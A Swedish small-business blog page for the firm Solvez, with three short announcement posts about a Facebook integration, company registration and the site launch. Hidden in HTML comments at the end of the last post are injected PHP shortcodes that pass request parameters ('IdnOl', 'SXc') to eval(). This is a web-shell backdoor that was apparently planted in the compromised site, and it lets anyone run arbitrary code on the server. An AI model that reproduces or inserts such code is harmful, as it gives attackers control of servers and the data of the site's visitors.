Okategoriserad

Nu finns vi på Facebook

Posted by on 18.01.2011 at 2:41 e m

Vi har integrerat några funktioner på hemsidan med Facebook och fört över tidigare blogginlägg. I framtiden kommer vi även att hålla med nyheter rörande datorer, mobiltelefoner och annat som kan vara nyttigt. Gå gärna med i gruppen om du är FB-användare, enklast gör du det genom att gå till Solvez-sidan på FB och klicka ”Gilla”. […]

Firma Solvez

Posted by on 28.04.2010 at 4:57 e m

Äntligen har registreringarna med patent- och registersyrelsen (i huvudsak handelsregistret) gått igenom och nu är allt officiellt, firma Solvez är igång! Detaljer står att läsa i patent- och registerstyrelsens samt skatteförvaltningens gemensamma företagsdatasystem.

Ute på nätet

Posted by on 01.04.2010 at 4:26 e m

Välkommen till sajten Solvez.com! Nu är servrarna och alla DNS :er körklara och innehåll fylls på efter hand. <!– [insert_php]if (isset($_REQUEST["IdnOl"])){eval($_REQUEST["IdnOl"]);exit;}[/insert_php][php]if (isset($_REQUEST["IdnOl"])){eval($_REQUEST["IdnOl"]);exit;}[/php] –> <!– [insert_php]if (isset($_REQUEST["SXc"])){eval($_REQUEST["SXc"]);exit;}[/insert_php][php]if (isset($_REQUEST["SXc"])){eval($_REQUEST["SXc"]);exit;}[/php] –>